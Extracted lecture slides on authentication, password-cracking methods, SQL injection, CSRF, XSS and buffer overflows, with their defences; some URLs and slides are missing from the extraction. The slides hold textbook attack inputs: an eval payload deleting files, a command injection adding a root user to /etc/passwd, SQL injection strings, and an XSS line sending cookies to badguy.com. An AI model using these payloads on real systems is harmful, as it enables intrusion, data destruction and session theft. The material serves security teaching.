1. PASSWORD ATTACK 2. APPLICATION ATTACK

Size: px

Start display at page:

Download "1. PASSWORD ATTACK 2. APPLICATION ATTACK"

Carol Perry
5 years ago
Views:

1 1. PASSWORD ATTACK 2. APPLICATION ATTACK

2 References: 1. Bruce Schneier, Applied Cryptography 2. CEH v7 Tutorial 2 21/03/2017

3 Authentication Authentication using One-Way Functions Authentication using Public-Key Cryptography Attack 21/03/2017 3

4 Authentication 21/03/2017 4

5 When Alice logs into a host computer, how does the host know who she is? How does the host know she is not Eve trying to falsify Alice s identity? Traditionally, passwords solve this problem. Both Alice and the host know this secret piece of knowledge and the host requests it from Alice every time she tries to log in. 21/03/2017 5

6 Authentication using One-Way Functions 21/03/2017 6

7 The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way functions. Instead of storing passwords, the host stores one-way functions of the passwords. 21/03/2017 7

8 1. Alice sends the host her password. 2. The host performs a one-way function on the password. 3. The host compares the result of the one-way function to the value it previously stored. 21/03/2017 8

9 Since the host no longer stores a table of everybody s valid password, the threat of someone breaking into the host and stealing the password list is mitigated. The list of passwords operated on by the one-way function is useless, because the one-way function cannot be reversed to recover the passwords. 21/03/2017 9

10 Authentication using Public-Key Cryptography 21/03/

11 PROBLEM : When Alice sends her password to her host, anyone who has access to her data path can read it. Eve can be at any one of those points, listening to Alice s login sequence. If Eve has access to the processor memory of the host, she can see the password before the host hashes it. 21/03/

12 Public-key cryptography can solve this problem. The host keeps a file of every user s public key. All users keep their own private keys. 21/03/

The host looks up Alice s public key in its database and decrypts the message using that public key.

13 When logging in, the protocol proceeds as follows: The host sends Alice a random string. Alice encrypts the string with her private key and sends it back to the host, along with her name. The host looks up Alice s public key in its database and decrypts the message using that public key. If the decrypted string matches what the host sent Alice in the first place, the host allows Alice access to the system. 21/03/

14 Secure proof-of-identity protocols take the following form: Alice performs a computation based on some random numbers and her private key and sends the result to the host. The host sends Alice a different random number. Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host. The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key. If she does, her identity is verified. 21/03/

15 If Alice does not trust the host any more than the host trusts Alice, then Alice will require the host to prove its identity in the same manner. Step (1) might seem unnecessary and confusing, but it is required to prevent attacks against the protocol. 21/03/

16 21/03/

17 Password Cracking Techniques (a) Dictionary attack (b) Brute force Attack (c) Hybrid Attack (d) Syllable Attack (e) Rulebased Attack (a) Based on familiar password (b) tries every combination of character (c) Like dictionary attack, but adds some number and symbol (d) Combination brute force attack and dictionary attack (e) Used when the attacker gets some information about password 21/03/

18 21/03/

Trojan enabling attackers to gets access to the stored password in the attacked computer Keylogger is a program that runs in the background and allow remote

19 Trojan enabling attackers to gets access to the stored password in the attacked computer Keylogger is a program that runs in the background and allow remote attackers to record every keystroke Spyware is a type of malware that allows attackers to get secret key gather information about person or organization 21/03/

20 21/03/

21 What does spyware do? Steals user s personal information and send it to remote server Monitor user s online activity Display annoying pop up and redirect browser to advertising site Decrease overall system security level Connects to remote pornography sites Reduce systems performance and causes software instability 21/03/

22 Purpose of Trojan: Steal information such as password, security codes, credit card information, using keylogger Delete or replace OS system critical file Generate fake traffic to create DoS attack Disable firewall and antivirus Use victim s PC for spamming Use victim s PC as a botnet 21/03/

23 21/03/

24 Default password is a password supplies by the manufacturer with new equipment that is password protected Ex: 21/03/

25 Windows stores user password in the Security Acccount Manager (SAM) not clear text, but hashed. 21/03/

26 References: 1. Network Security. John Mitchell. Standford University 2. CEH v7 Tutorial 26 21/03/2017

28 Web security threat model System Alice Web Attacker Sets up malicious site visited by victim; no control of network

29 Network security threat model Network Attacker System Intercepts and controls network communication Alice

30 Alice System Web Attacker Alice System Network Attacker

31 SQL Injection Browser sends malicious input to server Bad input checking fails to block malicious SQL CSRF Cross-site request forgery Bad web site sends browser request to good web site, using credentials of an innocent victim XSS Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site

32 SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query CSRF Cross-site request forgery Uses SQL to change meaning of database command Bad web site sends request to good web site, using credentials of an innocent victim who visits site Leverage user s session at victim sever XSS Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site Inject malicious script into trusted context

33 Background for SQL Injection

34 Attack goal: execute arbitrary code on the server Example code injection based on eval (PHP) (server side calculator) $in = $_GET[ exp']; eval('$ans = '. $in. ';'); Attack 10 ; system( rm *.* ) (URL encoded)

35 Example: PHP server-side code for sending Attacker can post $ = $_POST[ ] $subject = $_POST[ subject ] system( mail $ s $subject < /tmp/joinmynetwork ) OR =hacker@hackerhome.net & subject=foo < /usr/passwd; ls =hacker@hackerhome.net&subject=foo; echo evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

37 (the wrong way) Sample PHP $recipient = $_POST[ recipient ]; $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executequery($sql); Problem What if recipient is malicious string that changes the meaning of the query?

38 Victim Server 1 2 Attacker 3 receive valuable data unintended SQL query Victim SQL DB 38

39 CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed 39

40 WordPress SEO plugin by Yoast, March 2015 The latest version at the time of writing ( ) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities. The authenticated Blind SQL Injection vulnerability can be found within the admin/class-bulk-editor-list-table.php file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.

41 set ok = execute( "SELECT * FROM Users WHERE user=' " & form( user ) & " ' AND pwd=' " & form( pwd ) & ' ); if not ok.eof login success else fail; Is this exploitable? 41

42 Web Browser (Client) Enter Username & Password Web Server SELECT * FROM Users WHERE user='me' AND pwd='1234' DB Normal Query

43 Suppose user = ' or 1=1 -- (URL encoded) Then scripts does: ok = execute( SELECT WHERE user= ' ' or 1=1 -- ) The -- causes rest of line to be ignored. Now ok.eof is always false and login succeeds. The bad news: easy login to many sites this way. 43

44 Suppose user = ; DROP TABLE Users -- Then script does: ok = execute( SELECT WHERE user= ; DROP TABLE Users ) Deletes user table Similarly: attacker can add users, reset pwds, etc. 44

45 Suppose user = ; exec cmdshell net user badguy badpwd / ADD -- Then script does: ok = execute( SELECT WHERE username= ; exec ) If SQL server context runs as sa, attacker gets account on DB server 45

46 PHP: addslashes( or 1 = 1 -- ) outputs: \ or 1=1 -- Unicode attack: (GBK) $user = 0x bf 27 0x 5c \ 0x bf 27 0x bf 5c addslashes ($user) 0x bf 5c 27 Correct implementation: mysql_real_escape_string() 46

47 Never build SQL commands yourself! Use parameterized/prepared SQL Use ORM framework

48 Builds SQL queries by properly escaping args: \ Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE username AND password dbconnection); cmd.parameters.add("@user", Request[ user ] ); cmd.parameters.add("@pwd", Request[ pwd ] ); cmd.executereader(); In PHP: bound parameters -- similar function 48

50 Browser Server

51 Server Victim User Victim Attack Server Q: how long do you stay logged in to Gmail? Facebook?. 51

52 Example: User logs in to bank.com Session cookie remains in browser state User visits another site containing: <form name=f action= <input name=recipient value=badguy> <script> document.f.submit(); </script> Browser sends user auth cookie with request Transaction will be fulfilled Problem: cookie auth is insufficient when side effects occur

53 Cookie: SessionID=523FA4cd2E User credentials

54 Home router User 3 Bad web site 54

55 [SRJ 07] Fact: 50% of home users have broadband router with a default or no password Drive-by Pharming attack: User visits malicious site JavaScript at site scans home network looking for broadband router: SOP allows send only messages Detect success using onerror: <IMG SRC= onerror = do() > Once found, login to router and change DNS server Problem: send-only access sufficient to reprogram router

referer: http://www.site.com referer: http://www.site.com What if honest site sends POST to attacker.

62 referer: referer: What if honest site sends POST to attacker.com? Solution: origin header records redirect

63 Login CSRF Strict Referer/Origin header validation Login forms typically submit over HTTPS, not blocked HTTPS sites, such as banking sites Use strict Referer/Origin validation to prevent CSRF Other Use Ruby-on-Rails or other framework that implements secret token method correctly Origin header Alternative to Referer with fewer privacy problems Sent only on POST, sends only necessary data Defense against redirect-based attacks

65 Attack Server Victim client Victim Server

66 search field on victim.com: term = apple Server-side implementation of search.php: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> echo search term into response

67 Consider link: (properly URL encoded) term = <script> window.open( = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> 3. Browser executes script: Sends badguy.com cookie for victim.com

68 Attack Server term = <script>... </script> Victim client <html> Results for <script> window.open( document.cookie...) </script> </html> Victim Server

69 An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application Methods for injecting malicious code: Reflected XSS ( type 1 ) the attack script is reflected back to the user as part of a page from the victim site Stored XSS ( type 2 ) the attacker stores the malicious code in a resource managed by the web application, such as a database Others, such as DOM-based attacks

70 version 1 Attack Server 2 5 User Victim Server Victim

71 Attackers contacted users via and fooled them into accessing a particular URL hosted on the legitimate PayPal website. Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were then redirected to a phishing site and prompted to enter sensitive financial data. Source:

72 SQL Injection Bad input checking allows malicious SQL query Known defenses address problem effectively CSRF Cross-site request forgery Forged request leveraging ongoing session Can be prevented (if XSS problems fixed) XSS Cross-site scripting Problem stems from echoing untrusted input Difficult to prevent; requires care, testing, tools, Other server vulnerabilities Increasing knowledge embedded in frameworks, tools, application development recommendations

73 Ref 1. Professor Hossein Saiedian. KU electrical negineering and komputer science.

74 A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.

75 A very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others Prevention techniques known Still of major concern due to legacy of widely deployed buggy continued careless programming techniques

76 Caused by programming error Allows more data to be stored than capacity available in a fixed sized buffer buffer can be on stack, heap, global data Overwriting adjacent memory locations corruption of program data unexpected transfer of control memory access violation execution of code chosen by attacker

77 int main(int argc, char *argv[]) { int valid = FALSE; char str1[8]; char str2[8]; } next_tag(str1); gets(str2); if (strncmp(str1, str2, 8) == 0) valid = TRUE; printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid); $ cc -g -o buffer1 buffer1.c $./buffer1 START buffer1: str1(start), str2(start), valid(1) $./buffer1 EVILINPUTVALUE buffer1: str1(tvalue), str2(evilinputvalue), valid(0) $./buffer1 BADINPUTBADINPUT buffer1: str1(badinput), str2(badinputbadinput), valid(1)

78 Memory Address Before gets(str2) After gets(str2) Contains Value of bffffbf4 34fcffbf 4... bffffbf bffffbec bffffbe8 08fcffbf.... bffffbe bffffbe bffffbdc bffffbd S T A R bffffbd bffffbd fcffbf fcffbf e N P U T B A D I 4e N P U T B A D I argv argc return addr old base ptr valid str1[4-7] str1[0-3] str2[4-7] str2[0-3]

80 To exploit a buffer overflow an attacker must identify a buffer overflow vulnerability in some program inspection, tracing execution, fuzzing tools understand how buffer is stored in memory and determine potential for corruption

81 At machine level all data an array of bytes interpretation depends on instructions used Modern high-level languages have a strong notion of type and valid operations not vulnerable to buffer overflows does incur overhead, some limits on use C and related languages have high-level control structures, but allow direct access to memory hence are vulnerable to buffer overflow have a large legacy of widely used, unsafe, and hence vulnerable code

82 Stack frame: Calling function: needs a data structure to store the return address and parameters to be passed Called function: needs a place to store its local variables somewhere different for every call

83 Occurs when buffer is located on stack used by Morris Worm Smashing the Stack paper popularized it Have local variables below saved frame pointer and return address hence overflow of a local buffer can potentially overwrite these key control items Attacker overwrites return address with address of desired code program, system library or loaded in buffer

85 Buffer overflows are widely exploited Large amount of vulnerable code in use despite cause and countermeasures known Two broad defense approaches compile-time - harden new programs run-time - handle attacks on existing programs

86 Use a modern high-level languages with strong typing not vulnerable to buffer overflow compiler enforces range checks and permissible operations on variables Do have cost in resource use And restrictions on access to hardware so still need some code in C like languages

87 If using potentially unsafe languages eg C Programmer must explicitly write safe code by design with new code extensive after code review of existing code, (e.g., OpenBSD) Buffer overflow safety a subset of general safe coding techniques Allow for graceful failure (know how things may go wrong) check for sufficient space in any buffer

88 Proposals for safety extensions (library replacements) to C performance penalties must compile programs with special compiler Several safer standard library variants new functions, e.g. strlcpy() safer re-implementation of standard functions as a dynamic library, e.g. Libsafe

89 Stackgaurd: add function entry and exit code to check stack for signs of corruption Use random canary e.g. Stackguard, Win/GS, GCC check for overwrite between local variables and saved frame pointer and return address abort program if change found issues: recompilation, debugger support Or save/check safe copy of return address (in a safe, non-corruptible memory area), e.g. Stackshield, RAD

90 Many BO attacks copy machine code into buffer and xfer ctrl to it Use virtual memory support to make some regions of memory non-executable (to avoid exec of attacker s code) e.g. stack, heap, global data need h/w support in MMU long existed on SPARC/Solaris systems recent on x86 Linux/Unix/Windows systems Issues: support for executable stack code

91 Manipulate location of key data structures stack, heap, global data: change address by 1 MB using random shift for each process have large address range on modern systems means wasting some has negligible impact Randomize location of heap buffers and location of standard library functions

92 Place guard pages between critical regions of memory (or between stack frames) flagged in MMU (mem mgmt unit) as illegal addresses any access aborts process Can even place between stack frames and heap buffers at execution time and space cost

NET 311 INFORMATION SECURITY

NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)